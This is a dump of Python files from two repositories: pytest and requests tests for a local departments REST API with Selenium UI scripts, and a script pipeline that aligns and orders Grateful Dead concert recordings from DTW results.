        Keys: url (request URL), status (HTTP code), json (decoded body),
        text (body as str), headers, content (body as bytes), encoding.
        Renamed the original parameter `str`, which shadowed the builtin.
        """
        result = {}
        result['url'] = response.url
        result['status'] = response.status_code
        result['json'] = response.json()
        result['text'] = response.text
        result['headers'] = response.headers
        result['content'] = response.content
        result['encoding'] = response.encoding
        return result

    def get_method(self, url, params=None):
        """GET `url` (optionally with a params dict, e.g. {"id": "T01"})."""
        response = requests.get(url, params, timeout=5)
        return self.get_result(response)

    def post_method(self, url, data=None):
        """POST `data` (a dict, serialized to JSON) to `url`."""
        # headers defined unconditionally so a None payload cannot leave it unbound
        headers = {'content-type': 'application/json'}
        if data is not None:
            data = json.dumps(data)
        response = requests.post(url=url, data=data, headers=headers, timeout=5)
        return self.get_result(response)

    def put_method(self, url, data):
        """PUT `data` (a dict, serialized to JSON) to `url`."""
        headers = {'content-type': 'application/json'}
        if data is not None:
            data = json.dumps(data)
        response = requests.put(url=url, data=data, headers=headers, timeout=5)
        return self.get_result(response)

    def delete_method(self, url):
        """DELETE `url` and return the raw `requests` response.

        Deliberately skips get_result(): callers (Scripts/test_depart.py)
        read .status_code off the raw response. Timeout added for
        consistency with the other verbs.
        """
        response = requests.delete(url=url, timeout=5)
        return response
|
{"/Resources/resource_students.py": ["/Base/base_tools.py"], "/Resources/resource_depart.py": ["/Base/base_tools.py", "/Resources/__init__.py"], "/Resources/resource_in.py": ["/Resources/resource_classes.py", "/Resources/resource_depart.py", "/Resources/resource_students.py"], "/Scripts/test_depart.py": ["/Resources/resource_in.py", "/Base/read_yml.py"], "/Resources/resource_classes.py": ["/Base/base_tools.py"]}
|
34,471
|
LGY2008/Restful_Depart_Interface
|
refs/heads/master
|
/TestJB/test03.py
|
#encoding=utf-8
import json
import requests
# Departments collection endpoint
url = "http://127.0.0.1:8000/api/departments/"
# Restrict the collection to an explicit id list
params = {"$dep_id_list": "T01,T03"}
resp = requests.get(url, params=params)
# Inspect raw body, encoding, decoded JSON, and the final request URL
print(resp.content)
print(resp.encoding)
print(resp.json())
print(resp.url)
|
{"/Resources/resource_students.py": ["/Base/base_tools.py"], "/Resources/resource_depart.py": ["/Base/base_tools.py", "/Resources/__init__.py"], "/Resources/resource_in.py": ["/Resources/resource_classes.py", "/Resources/resource_depart.py", "/Resources/resource_students.py"], "/Scripts/test_depart.py": ["/Resources/resource_in.py", "/Base/read_yml.py"], "/Resources/resource_classes.py": ["/Base/base_tools.py"]}
|
34,472
|
LGY2008/Restful_Depart_Interface
|
refs/heads/master
|
/Base/read_yml_test.py
|
import yaml,os,sys
sys.path.append(os.getcwd())
class ReadYaml():
    """Ad-hoc reader for Data/depart_data.yml used during manual testing."""

    def read_yaml1(self):
        """Load ../Data/depart_data.yml and return the parsed document.

        Uses safe_load: yaml.load() without an explicit Loader is deprecated
        (PyYAML >= 5.1) and unsafe on untrusted input.
        """
        with open("../Data/depart_data.yml", "r", encoding="utf-8") as f:
            return yaml.safe_load(f)

if __name__ == '__main__':
    print(ReadYaml().read_yaml1().get("text_depart_add").get("data")[0].get("dep_id"))
|
{"/Resources/resource_students.py": ["/Base/base_tools.py"], "/Resources/resource_depart.py": ["/Base/base_tools.py", "/Resources/__init__.py"], "/Resources/resource_in.py": ["/Resources/resource_classes.py", "/Resources/resource_depart.py", "/Resources/resource_students.py"], "/Scripts/test_depart.py": ["/Resources/resource_in.py", "/Base/read_yml.py"], "/Resources/resource_classes.py": ["/Base/base_tools.py"]}
|
34,473
|
LGY2008/Restful_Depart_Interface
|
refs/heads/master
|
/Resources/resource_in.py
|
from Resources.resource_classes import ResourceClass
from Resources.resource_depart import ResourceDepart
from Resources.resource_students import ResourceStudent
class ResourceIn():
    """Single entry point handing out one resource facade per entity type."""

    def get_depart(self):
        """Return the department resource facade."""
        return ResourceDepart()

    def get_class(self):
        """Return the class resource facade."""
        return ResourceClass()

    def get_student(self):
        """Return the student resource facade."""
        return ResourceStudent()
|
{"/Resources/resource_students.py": ["/Base/base_tools.py"], "/Resources/resource_depart.py": ["/Base/base_tools.py", "/Resources/__init__.py"], "/Resources/resource_in.py": ["/Resources/resource_classes.py", "/Resources/resource_depart.py", "/Resources/resource_students.py"], "/Scripts/test_depart.py": ["/Resources/resource_in.py", "/Base/read_yml.py"], "/Resources/resource_classes.py": ["/Base/base_tools.py"]}
|
34,474
|
LGY2008/Restful_Depart_Interface
|
refs/heads/master
|
/TestJB/test07_PUT.py
|
import json
import requests
# Target resource URL for the update
url = "http://127.0.0.1:8000/api/departments/T0111/"
# Updated department payload
data = {
    "data": [
        {
            "dep_id": "T0111",
            "dep_name": "Test学院updata",
            "master_name": "Test-Master",
            "slogan": "Here is Slogan"
        }
    ]
}
# JSON request headers
headers = {'content-type': 'application/json'}
resp = requests.put(url, data=json.dumps(data), headers=headers)
# Status code, then the response body as text
print(resp.status_code)
print(resp.text)
|
{"/Resources/resource_students.py": ["/Base/base_tools.py"], "/Resources/resource_depart.py": ["/Base/base_tools.py", "/Resources/__init__.py"], "/Resources/resource_in.py": ["/Resources/resource_classes.py", "/Resources/resource_depart.py", "/Resources/resource_students.py"], "/Scripts/test_depart.py": ["/Resources/resource_in.py", "/Base/read_yml.py"], "/Resources/resource_classes.py": ["/Base/base_tools.py"]}
|
34,475
|
LGY2008/Restful_Depart_Interface
|
refs/heads/master
|
/TestJB/test05.py
|
from time import sleep
from selenium.webdriver.common.action_chains import ActionChains
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
driver = webdriver.Firefox()
# Local registration page under test (file:// URL, percent-encoded path)
url = "file:///E:/%E8%AF%BE%E5%A0%82/WebDriver/%E6%B3%A8%E5%86%8CA.html"
driver.get(url)
user_field = driver.find_element_by_xpath("//*[@id='userA']")
print("元素为:", user_field)
# Right-click the field, then type a character into it
ActionChains(driver).context_click(user_field).perform()
user_field.send_keys('p')
sleep(3)
driver.close()
|
{"/Resources/resource_students.py": ["/Base/base_tools.py"], "/Resources/resource_depart.py": ["/Base/base_tools.py", "/Resources/__init__.py"], "/Resources/resource_in.py": ["/Resources/resource_classes.py", "/Resources/resource_depart.py", "/Resources/resource_students.py"], "/Scripts/test_depart.py": ["/Resources/resource_in.py", "/Base/read_yml.py"], "/Resources/resource_classes.py": ["/Base/base_tools.py"]}
|
34,476
|
LGY2008/Restful_Depart_Interface
|
refs/heads/master
|
/Base/read_yml.py
|
import yaml,os
class ReadYaml():
def __init__(self,file_name):
self.file_name=os.getcwd()+os.sep+"Data"+os.sep+file_name
def read_yaml(self):
with open(self.file_name,"r",encoding="utf-8") as f:
return yaml.load(f)
|
{"/Resources/resource_students.py": ["/Base/base_tools.py"], "/Resources/resource_depart.py": ["/Base/base_tools.py", "/Resources/__init__.py"], "/Resources/resource_in.py": ["/Resources/resource_classes.py", "/Resources/resource_depart.py", "/Resources/resource_students.py"], "/Scripts/test_depart.py": ["/Resources/resource_in.py", "/Base/read_yml.py"], "/Resources/resource_classes.py": ["/Base/base_tools.py"]}
|
34,477
|
LGY2008/Restful_Depart_Interface
|
refs/heads/master
|
/TestJB/test07_DELETE.py
|
import requests
# Resource to remove
url = "http://127.0.0.1:8000/api/departments/Test_0111/"
resp = requests.delete(url)
# Status code, then the response body as text
print(resp.status_code)
print(resp.text)
|
{"/Resources/resource_students.py": ["/Base/base_tools.py"], "/Resources/resource_depart.py": ["/Base/base_tools.py", "/Resources/__init__.py"], "/Resources/resource_in.py": ["/Resources/resource_classes.py", "/Resources/resource_depart.py", "/Resources/resource_students.py"], "/Scripts/test_depart.py": ["/Resources/resource_in.py", "/Base/read_yml.py"], "/Resources/resource_classes.py": ["/Base/base_tools.py"]}
|
34,478
|
LGY2008/Restful_Depart_Interface
|
refs/heads/master
|
/TestJB/test02.py
|
import requests,urllib3
# Smoke check: fetch a page and inspect the type of the raw body
resp = requests.get("http://www.baidu.com")
print(type(resp.content))
|
{"/Resources/resource_students.py": ["/Base/base_tools.py"], "/Resources/resource_depart.py": ["/Base/base_tools.py", "/Resources/__init__.py"], "/Resources/resource_in.py": ["/Resources/resource_classes.py", "/Resources/resource_depart.py", "/Resources/resource_students.py"], "/Scripts/test_depart.py": ["/Resources/resource_in.py", "/Base/read_yml.py"], "/Resources/resource_classes.py": ["/Base/base_tools.py"]}
|
34,479
|
LGY2008/Restful_Depart_Interface
|
refs/heads/master
|
/Scripts/test_depart.py
|
import os,sys
import pytest
sys.path.append(os.getcwd())
from Resources.resource_in import ResourceIn
from Base.read_yml import ReadYaml
# Fixture loader: map an HTTP verb onto its section of depart_data.yml
def get_data(method):
    """Return the yml fixture block for `method` ('get'/'post'/'put'/'delete')."""
    if method == "get":
        return ReadYaml("depart_data.yml").read_yaml().get("text_depart_get_all")
    if method == "post":
        return ReadYaml("depart_data.yml").read_yaml().get("text_depart_add")
    if method == "put":
        return ReadYaml("depart_data.yml").read_yaml().get("text_depart_all")
    if method == "delete":
        # the dep_id of the record created by the POST fixture
        return ReadYaml("depart_data.yml").read_yaml().get("text_depart_add").get("data")[0].get("dep_id")
class TestDepart():
    """Ordered end-to-end CRUD checks for the department API."""

    def setup_class(self):
        # Shared department resource facade for all tests
        self.res = ResourceIn().get_depart()
        print("获取新增ID:", get_data("delete"))

    @pytest.mark.run(order=1)
    def test_add_depart(self):
        """Create a department and expect HTTP 201."""
        try:
            result = self.res.resource_add_depart(get_data("post"))
            status = result.get("status")
            assert 201 == status, "断言新增响应码出错!"
            print("新增返回状态码:", status)
        except Exception:
            print("出错了")
            raise

    @pytest.mark.run(order=2)
    def test_get_depart_one(self):
        """Fetch the department created above; verify its id and HTTP 200."""
        result = self.res.resource_get_depart_one(get_data("delete"))
        try:
            print("查询指定获取结果", result.get("json").get("dep_id"))
            assert get_data("delete") == result.get("json").get("dep_id")
            assert 200 == result.get("status")
            print("查询指定成功,新增成功!")
        except Exception:
            print("查询指定出错,新增失败!")
            # Re-raise: the original swallowed failures, silently passing the test.
            raise

    @pytest.mark.run(order=3)
    def test_get_depart(self):
        """List all departments; verify the expected status and text snippet."""
        result = self.res.resource_get_depart_all()
        try:
            assert get_data("get").get("expect_status") == result.get("status"), "断言响应状态码出错!"
            print(result.get("status"))
            assert get_data("get").get("expect_text") in result.get("text"), "断言文本出错"
            print("查询所有学院成功...")
        except Exception:
            print("查询所有学院失败...")
            raise

    @pytest.mark.run(order=4)
    def test_delete_depart(self):
        """Delete the created department and expect HTTP 204.

        delete_method returns the raw requests.Response, so attributes
        (not dict .get()) must be used; the original trailing
        result.get("url")/result.get("status") calls raised AttributeError.
        """
        result = self.res.resource_delete_depart(get_data("delete"))
        print("删除URL为:", result.status_code)
        try:
            assert 204 == result.status_code
            print("删除新增学院,成功!")
        except AssertionError:
            print("删除新增学院!")
            raise
        print(result.url)
        print(result.status_code)
|
{"/Resources/resource_students.py": ["/Base/base_tools.py"], "/Resources/resource_depart.py": ["/Base/base_tools.py", "/Resources/__init__.py"], "/Resources/resource_in.py": ["/Resources/resource_classes.py", "/Resources/resource_depart.py", "/Resources/resource_students.py"], "/Scripts/test_depart.py": ["/Resources/resource_in.py", "/Base/read_yml.py"], "/Resources/resource_classes.py": ["/Base/base_tools.py"]}
|
34,480
|
LGY2008/Restful_Depart_Interface
|
refs/heads/master
|
/TestJB/test06_POST.py
|
import json
import unittest
import requests
class Test01(unittest.TestCase):
    """Manual POST check against the departments endpoint."""

    def test001(self):
        # Collection endpoint
        url = "http://127.0.0.1:8000/api/departments/"
        # Payload for the new department
        data = {
            "data": [
                {
                    "dep_id": "T0111",
                    "dep_name": "Test学院",
                    "master_name": "Test-Master",
                    "slogan": "Here is Slogan"
                }
            ]
        }
        headers = {'content-type': 'application/json'}
        response = requests.post(url, data=json.dumps(data), headers=headers)
        response.encoding = "utf-8"
        print(response.status_code)
        actual = response.json()
        # Expected body: nothing pre-existing, exactly one created record
        expect_result = {"already_exist":{"count":0,"results":[]},"create_success":{"count":1,"results":[{"dep_id":"T0111","dep_name":"Test学院","master_name":"Test-Master","slogan":"Here is Slogan"}]}}
        assert actual == expect_result

if __name__ == '__main__':
    unittest.main()
|
{"/Resources/resource_students.py": ["/Base/base_tools.py"], "/Resources/resource_depart.py": ["/Base/base_tools.py", "/Resources/__init__.py"], "/Resources/resource_in.py": ["/Resources/resource_classes.py", "/Resources/resource_depart.py", "/Resources/resource_students.py"], "/Scripts/test_depart.py": ["/Resources/resource_in.py", "/Base/read_yml.py"], "/Resources/resource_classes.py": ["/Base/base_tools.py"]}
|
34,481
|
LGY2008/Restful_Depart_Interface
|
refs/heads/master
|
/TestJB/test04.py
|
from time import sleep
import time
import sys
from selenium import webdriver
import unittest
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.common.keys import Keys
class test01(unittest.TestCase):
def setUp(self):
self.driver = webdriver.Firefox()
self.driver.get("http://git.lilianinfo.com:4044")
self.driver.find_element_by_class_name("username").send_keys("0")
self.driver.find_element_by_class_name("password").send_keys("88998877")
# 点击登陆按钮
self.driver.find_element_by_xpath(".//*[@id='react-content']/div/div[2]/form/a").click()
# 浏览器最大化
self.driver.maximize_window()
sleep(1)
def tearDown(self):
sleep(2)
self.driver.find_element_by_css_selector(".navbarlsta.personmenu>span").click()
sleep(1)
self.driver.find_element_by_xpath(".//*[@id='personal']/div/div[2]/div[2]/button").click()
sleep(2)
self.driver.quit()
def test001(self):
driver = self.driver
driver.implicitly_wait(30)
# 点击导航栏
driver.find_element_by_css_selector(".icon.iconfont.icon-Expand").click()
# 点击病例预警主菜单
driver.find_element_by_xpath(".//*[@id='lteNav']/li[2]/p/p/span").click()
# 点击病例预警子菜单
driver.find_element_by_xpath(".//*[@id='ltewrap']/div[2]/div/ul/li[1]/a").click()
sleep(2)
driver.find_element_by_xpath(".//*[@id='maincontent']/div/div[2]/div/div[2]/div[1]/div/div[2]/div/div/div[1]/div/div[1]/div/div/div/div/div/div/div[2]/table/tbody/tr[3]/td[3]/div").click()
sleep(1)
driver.find_element_by_xpath(".//*[@id='maincontent']/div/div[2]/div/div[2]/div[1]/div/div[2]/div/div/div[3]/div[1]/div/div/div/div/div/div/div[2]/table/tbody/tr[1]/td[3]/div/div/div/div/div").click()
# try:
# sleep(2)
# # text1 = driver.find_element_by_css_selector(".ant-select-dropdown-menu-item-active.ant-select-dropdown-menu-item-selected.ant-select-dropdown-menu-item").text
# text2 = driver.find_element_by_class_name("ant-select-dropdown-menu-item-active").text
# # text3 = driver.find_element_by_css_selector("").text
# # text4 = driver.find_element_by_css_selector("").text
# # text5 = driver.find_element_by_xpath("/html/body/div[4]/div/div/div/ul/li[5]").text
# # text6 = driver.find_element_by_xpath("/html/body/div[4]/div/div/div/ul/li[6]").text
#
# # print("提示的信息为:", text1)
# print("提示的信息为:", text2)
# # print("提示的信息为:", text3)
# # print("提示的信息为:", text4)
# # print("提示的信息为:", text5)
# # print("提示的信息为:", text6)
# # 断言
#
# # self.assertEqual("疑似", text1)
# self.assertEqual("院内", text2)
# # self.assertEqual("院外", text3)
# # self.assertEqual("排除", text4)
# # self.assertEqual("待查", text5)
# # self.assertEqual("转归", text6)
# except AssertionError:
# print("获取的sys.exc_info()信息为:", sys.exc_info()[1])
# nowtime = time.strftime("%Y_%m_%d %H_%M_%S")
#
# print("时间格式为:", nowtime)
# driver.get_screenshot_as_file("../Image/%s-%s.jpg" % (nowtime, "test_107在院病例预警疑似初始显示"))
# # 抛异常
# raise
try:
text1 = driver.find_element_by_xpath("html/body/div[2]/div/div/div/ul/li[1]").text
text2 = driver.find_element_by_xpath("html/body/div[2]/div/div/div/ul/li[2]").text
# text3 = driver.find_element_by_xpath("html/body/div[2]/div/div/div/ul/li[3]").text
# text4 = driver.find_element_by_xpath("html/body/div[2]/div/div/div/ul/li[4]").text
# text5 = driver.find_element_by_xpath("html/body/div[2]/div/div/div/ul/li[5]").text
# text6 = driver.find_element_by_xpath("html/body/div[2]/div/div/div/ul/li[6]").text
print("提示的信息为:", text1)
print("提示的信息为:", text2)
# print("提示的信息为:", text3)
# print("提示的信息为:", text4)
# print("提示的信息为:", text5)
# print("提示的信息为:", text6)
assert text1 == "疑似"
assert text1 == "院内"
# assert text1 == "院外"
# assert text1 == "排除"
# assert text1 == "待查"
# assert text1 == "转归"
print(text1)
print(text2)
# print(text3)
# print(text4)
# print(text5)
# print(text6)
except Exception as e:
# print("获取的sys.exc_info()信息为:", sys.exc_info()[1])
print("测试失败", format(e))
nowtime = time.strftime("%Y_%m_%d %H_%M_%S")
print("时间格式为:", nowtime)
driver.get_screenshot_as_file("../Image/%s-%s.jpg" % (nowtime, "test_107在院病例预警疑似初始显示"))
if __name__ == '__main__':
unittest.main()
|
{"/Resources/resource_students.py": ["/Base/base_tools.py"], "/Resources/resource_depart.py": ["/Base/base_tools.py", "/Resources/__init__.py"], "/Resources/resource_in.py": ["/Resources/resource_classes.py", "/Resources/resource_depart.py", "/Resources/resource_students.py"], "/Scripts/test_depart.py": ["/Resources/resource_in.py", "/Base/read_yml.py"], "/Resources/resource_classes.py": ["/Base/base_tools.py"]}
|
34,482
|
LGY2008/Restful_Depart_Interface
|
refs/heads/master
|
/Resources/resource_classes.py
|
from Base.base_tools import BaseTools
class ResourceClass(BaseTools):
    """Resource layer for the class endpoints; every operation is still a stub."""

    def resource_get_class_all(self):
        """Query all classes (not implemented)."""
        pass

    def resource_get_class_one(self):
        """Query a single class by id (not implemented)."""
        pass

    def resource_get_class_list(self):
        """Query an explicit list of classes (not implemented)."""
        pass

    def resource_get_class_partial(self):
        """Fuzzy-match class query (not implemented)."""
        pass

    def resource_get_class_combo(self):
        """Combined-field class query (not implemented)."""
        pass

    def resource_add_class(self):
        """Create a class (not implemented)."""
        pass

    def resource_update_class(self):
        """Update a class (not implemented)."""
        pass

    def resource_delete_class(self):
        """Delete a class (not implemented)."""
        pass
|
{"/Resources/resource_students.py": ["/Base/base_tools.py"], "/Resources/resource_depart.py": ["/Base/base_tools.py", "/Resources/__init__.py"], "/Resources/resource_in.py": ["/Resources/resource_classes.py", "/Resources/resource_depart.py", "/Resources/resource_students.py"], "/Scripts/test_depart.py": ["/Resources/resource_in.py", "/Base/read_yml.py"], "/Resources/resource_classes.py": ["/Base/base_tools.py"]}
|
34,483
|
grateful-dead-live/recordings_alignment
|
refs/heads/master
|
/prepare.py
|
import os, json, re
import networkx as nx
from networkx.drawing.nx_agraph import read_dot
from copy import copy
from collections import Counter
from subprocess import Popen, DEVNULL, PIPE
from pprint import pprint
from internetarchive import get_item
import pickle, sys
#DATE = '90-03-14'
#FOLDER = '/Volumes/gspeed1/thomasw/grateful_dead/2020/GD-DTW/results_15s_linregress/'#90-03-14/' #116030_116746'
# Root folder holding per-date DTW alignment results (one subfolder per date)
FOLDER = '/Volumes/gspeed1/thomasw/grateful_dead/2020/GD-DTW/results/'
#FOLDER = './'
def etreeNumber(e):
    """Return the first dot-separated segment of `e` that parses as an int.

    Used to pull the etree recording number out of a folder name.
    Returns None when no segment is numeric. The original's bare
    `except: pass` is narrowed to ValueError so real errors surface.
    """
    for part in e.split('.'):
        try:
            return int(part)
        except ValueError:
            continue
    return None
# dict to find folders of recordings to get lengths of unmatched files
def getDirsDict():
    """Map each recording's etree number (as a str) to its folder; cached in dirdict.json.

    Keys are stringified at build time: json.dump stringifies int keys anyway,
    so the original returned int keys on the first run but str keys from the
    cache — and get_lengths indexes with a string (dirsdict[fs[0]]), which
    made the first run fail with KeyError.
    """
    if os.path.exists('dirdict.json'):
        return json.load(open('dirdict.json'))
    DIR1 = '/Volumes/gspeed1/thomasw/grateful_dead/lma'
    DIR2 = '/Volumes/gspeed1/thomasw/grateful_dead/lma_soundboards/sbd'
    dirs = []
    for base in (DIR1, DIR2):
        dirs += [os.path.join(base, f) for f in os.listdir(base)
                 if os.path.isdir(os.path.join(base, f))]
    dirDict = {str(etreeNumber(d.split('/')[-1])): d for d in dirs}
    json.dump(dirDict, open('dirdict.json', 'w'))
    return dirDict
def loadJson(date):
    # Load every pairwise-alignment JSON for `date` from FOLDER/<date>/.
    # Folder names look like '<idA>_<idB>', file names like
    # '<fileA>__<fileB>.json'; the key is rebuilt as
    # '<idA>_<fileA>__<idB>_<fileB>' by interleaving the two splits.
    print('loading json files')
    jsons = {}
    folder = os.path.join(FOLDER, date)
    for d in [f for f in os.listdir(folder) if os.path.isdir(os.path.join(folder, f))]:
        print(d)
        # skip '*full.json' and 'unmatched*' files; only per-pair results
        for f in [i for i in os.listdir(os.path.join(folder, d)) if i.endswith('.json') and not i.endswith('full.json') and not i.startswith('unmatched')]:
            k = '{0}_{2}__{1}_{3}'.format(*d.split('_')+f[:-5].split('__') )
            #jsons[d+'__'+f[:-5]] = json.load(open(os.path.join(folder, d, f)))
            jsons[k] = json.load(open(os.path.join(folder, d, f)))
    try:
        # optional list of files that matched nothing for this date
        jsons['unmatched'] = json.load(open(os.path.join(folder, 'unmatched.json')))['unmatched']
    except:
        #print('no unmatched files found')
        jsons['unmatched'] = []
    return jsons
# find all in_edges including indirectly connected
def find_connected(g, node):
    """Collect every predecessor chain leading into `node`.

    Transitively gathers in-edges, merges overlapping edge tuples into
    longer paths, and returns each chain as a list with its last element
    stripped.
    """
    def find_connected_r(g, nodes, connected):
        # frontier expansion: gather in-edges of the current edge heads
        new_connections = []
        for n in nodes:
            for i in g.in_edges(n[0]):
                new_connections.append(i)
        if new_connections:
            connected += list(new_connections)
            return find_connected_r(g, new_connections, connected)
        else:
            return connected
    def chain_connected(cn):
        # repeatedly merge tuples whose tail equals another tuple's head
        c = 0
        to_del = []  # NOTE(review): unused; kept to leave the code byte-identical
        result = copy(cn)
        for i, n in enumerate(cn):
            for j, m in enumerate(cn):
                if n[-1] == m[0]:
                    c += 1
                    result[i] = tuple(list(n) + list(m)[1:])
        if c == 0:
            # fixed point: no more merges possible
            return result
        else:
            return chain_connected(result)
    cn = list(g.in_edges(node))
    cn = find_connected_r(g, cn, cn)
    cn = chain_connected(cn)
    # drop the final element of each chain
    cn = [list(n[:-1]) for n in cn]
    return cn
# get connected graphs of individual tracks
def sub_graphs(g):
    """One {sink: predecessor-chain list} dict per node with in-edges but no out-edges."""
    sinks = [node for node in g.nodes()
             if len(g.in_edges(node)) > 0 and len(g.out_edges(node)) == 0]
    return [{sink: find_connected(g, sink)} for sink in sinks]
def get_all_ids(g):
    """Unique recording ids (node-name prefix before '_'), in first-seen order."""
    seen = []
    for node in g.nodes():
        rec_id = node.split('_')[0]
        if rec_id not in seen:
            seen.append(rec_id)
    return seen
# sort recording by number of matched files
def rank_ids_amount(s):
    """Recording ids ordered by how many matched-file subgraphs each heads."""
    counts = Counter(list(sub.keys())[0].split('_')[0] for sub in s)
    return [rec_id for rec_id, _ in counts.most_common()]
# sort recording by length
def rank_ids_length(lengths):
    """Recording ids ordered by total track duration, longest first."""
    totals = [(sum(duration for _, duration in files), rec_id)
              for rec_id, files in lengths.items()]
    return [rec_id for _, rec_id in sorted(totals, reverse=True)]
def get_lengths(jsons, id, dirsdict):
    # Collect (filename, length) pairs for recording `id`: first from the
    # matched-pair jsons, then -- via shntool/soxi subprocesses -- for any
    # unmatched files belonging to this id.
    lengths = []
    for k in jsons.keys():
        # keys look like '<idA>_<fileA>__<idB>_<fileB>'
        key_ids = [i.split('_')[0] for i in k.split('__')]
        if id in key_ids:
            filename = jsons[k]['filenames'][key_ids.index(id)].split('/')[-1]
            length = jsons[k]['lengths'][key_ids.index(id)]
            if (filename, length) not in lengths:
                #print(id, filename)
                lengths.append((filename, length))
    unmatched = [f for f in jsons['unmatched'] if f.startswith(id)]
    if unmatched:
        #print('unmatched:', unmatched)
        for f in unmatched:
            fs = f.split('_')
            pa = os.path.join(dirsdict[fs[0]], fs[1])
            if f.lower().endswith('shn'):
                # shntool reports 'mm:ss.cc'; convert to seconds.
                # NOTE(review): str(p).split()[10] is position-dependent on
                # shntool's output format -- confirm against installed version
                cmd = 'shntool len ' + pa
                p = Popen(cmd, shell=True,stdout=PIPE).communicate()
                s = str(p).split()[10].replace('.',':').split(':')
                l = int(s[0])*60 + int(s[1]) + int(s[2])*0.01
            else:
                # soxi -D prints the duration in seconds
                cmd = 'soxi -D ' + pa
                p = Popen(cmd, shell=True,stdout=PIPE).communicate()
                l = float(str(p[0])[2:-3])
            lengths.append((fs[1], l))
            #print(pa,l)
            #l = float(next(item for item in get_item(pa.split('/')[-2]).item_metadata['files'] if item["name"] == pa.split('/')[-1])['length'])
            #lengths.append((fs[1], l))
            #print(pa,l)
    #print(lengths)
    return sorted(lengths)
def prepare_data(date):
    # Assemble everything align1.py needs for one date: the track subgraphs,
    # recordings ranked by match count and by total length, per-recording
    # track lengths, and the raw pairwise-alignment jsons.
    #print('analysing graph')
    g = read_dot(os.path.join(FOLDER+date, date+'.dot'))
    #g = read_dot(date+'.dot')
    #pickle.dump(g, open('g.pickle', 'wb'))
    #g = pickle.load(open('g.pickle', 'rb'))
    subs = sub_graphs(g)
    ids_by_number_of_matched_files = rank_ids_amount(subs)
    dirsdict = getDirsDict()
    jsons = loadJson(date)
    #jsons = pickle.load(open('jsons.pickle', 'rb'))
    #pickle.dump(jsons, open('jsons.pickle', 'wb'))
    #json.dump(jsons, open('jsons.json', 'w'))
    #jsons = json.load(open('jsons.json'))
    lengths = {}
    for i in get_all_ids(g):
        lengths[i] = get_lengths(jsons, i, dirsdict)
    #json.dump(lengths, open('lengths.json', 'w'))
    #lengths = json.load(open('lengths.json'))
    ids_by_length = rank_ids_length(lengths)
    # add unmatched to subgraph:
    # isolated nodes have no alignment partners, so they get empty chain lists
    for n in nx.isolates(g):
        subs.append({n:[]})
    return subs, ids_by_length, ids_by_number_of_matched_files, lengths, jsons
def main():
    """Placeholder entry point; prepare_data() is driven from align1.py instead."""
    pass

if __name__ == "__main__":
    main()
|
{"/align1.py": ["/prepare.py"]}
|
34,484
|
grateful-dead-live/recordings_alignment
|
refs/heads/master
|
/align1.py
|
from prepare import prepare_data
import json, sys, os
from collections import Counter
from pprint import pprint
from scipy import stats
import numpy as np
from copy import copy
from pprint import pprint
from scipy import stats
import matplotlib.pyplot as plt
from meta_alignment_test import plot_timelines
#DATE = sys.argv[1]
#DATE = '90-03-14'
#DATE = '90-03-24'
# Concert date whose alignment results are processed
DATE = '90-03-15'
# Minimum Pearson r for a point set to count as well aligned
MIN_R = 0.9999
# Collapse one nesting level: [[a, b], [c]] -> [a, b, c]
flatten = lambda l: [item for sublist in l for item in sublist]
def sort_subgraphs(subs, lengths, ids_by_length):
    # Order the track subgraphs so they follow the track order implied by the
    # recordings, processing the longest recording first and merging the rest
    # of the recordings' orderings into it.
    # flatten one subgraph {sink: chains} into the set of all node names it contains
    flatsub = lambda l: list(set([list(l.keys())[0]] + [x for sublist in list(l.values())[0] for x in sublist]))
    # file_lists sorted by list length
    file_list = []
    for i in ids_by_length:
        file_list.append([i+'_'+t[0] for t in lengths[i]])
    sorted_subs_all = []
    for i, rec in enumerate(file_list):
        # subgraph indices in this recording's track order (dedup, keep order)
        sorted_subs = []
        for track in rec:
            for j, s in enumerate(subs):
                sflat = flatsub(s)
                if track in sflat:
                    sorted_subs.append(j)
                    break
        sorted_subs_all.append(list(dict.fromkeys(sorted_subs)))
    sorted_subs_all = sorted(sorted_subs_all, key=len, reverse=True)
    # start from the longest ordering, then splice in unseen subgraphs by
    # anchoring on the nearest already-placed neighbour (before or after)
    ordered = sorted_subs_all[0]
    for rec in sorted_subs_all[1:]:
        for i, n in enumerate(rec):
            if n not in ordered:
                prevs = [m for m in rec[:i]]
                prevs.reverse()
                nexts = [m for m in rec[i+1:]]
                pos = None
                for p in range(max([len(prevs), len(nexts)])):
                    if p < len(prevs)-1:
                        try:
                            pos = ordered.index(prevs[p]) + 1
                            break
                        except:
                            pass
                    if p < len(nexts)-1:
                        try:
                            pos = ordered.index(nexts[p])
                            break
                        except:
                            pass
                if pos != None:
                    ordered.insert(pos, n)
                else:
                    pass
                    print('cannot reorder item', rec, n)
    print(ordered)
    res = [subs[i] for i in ordered]
    return res
def track_tuple_to_json_id(n):
    """Join the elements of a track tuple into a single json key string."""
    separator = '__'
    return separator.join(n)
def find_dupes(subs):
    """Return {track_id: count} for first-elements that occur more than once
    across all subgraphs, or None when there are no duplicates.

    Each item in *subs* is a one-entry dict mapping a reference track to a
    list of match tuples; the first element of each tuple is the track id.
    """
    dupes = []
    for s in subs:
        matches = list(s.values())[0]
        if len(matches) > 0:
            # BUG FIX: accumulate ids from every subgraph instead of
            # rebinding `dupes` each iteration, which kept only the ids
            # of the last non-empty subgraph.
            dupes.extend(x[0] for x in matches)
    newDict = {k: c for k, c in Counter(dupes).items() if c > 1}
    if newDict:
        return newDict
#splits into continuous line segments
def split_segments2(points, delta=0.5):
    """Sort *points* and split them into runs where both coordinates change
    by at most *delta* between consecutive points."""
    ordered = sorted(points)
    segments = []
    current = []
    for idx, pt in enumerate(ordered):
        if idx > 0:
            prev = ordered[idx - 1]
            # A jump in either dimension starts a new segment.
            if abs(pt[0] - prev[0]) > delta or abs(pt[1] - prev[1]) > delta:
                segments.append(current)
                current = []
        current.append(pt)
    segments.append(current)
    return segments
def find_best_break(segs):
    """If the pooled points of *segs* fit one line worse than MIN_R, return
    the interior split index whose better-fitting half has the highest r
    value; otherwise return None."""
    overall_r = stats.linregress(flatten(segs))[2]
    if overall_r >= MIN_R:
        return None
    scores = []
    for cut in range(len(segs)):
        halves = (flatten(segs[:cut]), flatten(segs[cut:]))
        half_rs = [stats.linregress(h)[2] for h in halves if len(h) > 0]
        scores.append(max(half_rs))
    winner = np.argmax(scores)
    # Only a strictly interior cut is a usable break point.
    if 0 < winner < len(segs):
        return winner
def partition(segs):
    """Repeatedly split segment groups at their best break point until no
    group can be improved; return the final list of groups."""
    groups = [segs]
    while True:
